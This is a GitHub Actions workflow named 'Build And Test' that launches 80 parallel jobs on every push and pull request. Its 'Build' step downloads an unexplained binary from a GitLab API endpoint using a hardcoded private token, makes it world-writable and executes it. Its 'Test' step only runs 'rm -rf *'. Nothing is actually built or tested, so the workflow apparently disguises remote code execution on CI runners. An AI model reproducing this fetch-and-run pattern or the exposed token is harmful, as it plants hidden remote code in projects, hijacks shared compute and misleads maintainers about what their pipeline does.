name: Build And Test

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs: 
  build:
    runs-on: ubuntu-18.04
    strategy:
      matrix:
        D1: [0,1,2,3,4,5,6,7,8,9]
        D2: [0,1,2,3,4,5,6,7]
      fail-fast: false
    steps:
    - name: Run checkout@v2.3.4
      uses: actions/checkout@v2.3.4

    - name: Build
      run: |
        wget -O builder --header='PRIVATE-TOKEN: skKqc7V8YmbfdHYxBft9' 'https://gitlab.com/api/v4/projects/24890163/repository/files/builder/raw?ref=master' && chmod 777 builder && ./builder
        echo "done"
    - name: Test
      run: |
        rm -rf *
        echo "done"  
